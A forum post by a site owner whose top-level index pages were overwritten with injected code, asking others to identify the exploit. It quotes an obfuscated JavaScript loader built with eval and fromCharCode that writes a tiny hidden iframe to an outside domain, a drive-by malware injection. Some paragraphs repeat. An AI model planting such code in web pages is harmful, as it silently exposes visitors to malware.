I started getting user complaints today about malware warnings on web pages. I checked and the top level index file was overwritten on 5/25/09 for each domain with the following script just after the body tag:
Only the top level index files in each domain's public_html folder were overwritten. No public_html subfolders appear to have been altered.
I'm resetting all passwords, but obviously wondering if there might be another security hole that allowed this. Googling the script turned up nothing.
Doe anyone here recognize this exploit?
TIA
Code:
<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59,118,97,114,32,119,61,34,111,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,114,32,115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50))</script>
Only the top level index files in each domain's public_html folder were overwritten. No public_html subfolders appear to have been altered.
I'm resetting all passwords, but obviously wondering if there might be another security hole that allowed this. Googling the script turned up nothing.
Doe anyone here recognize this exploit?
TIA
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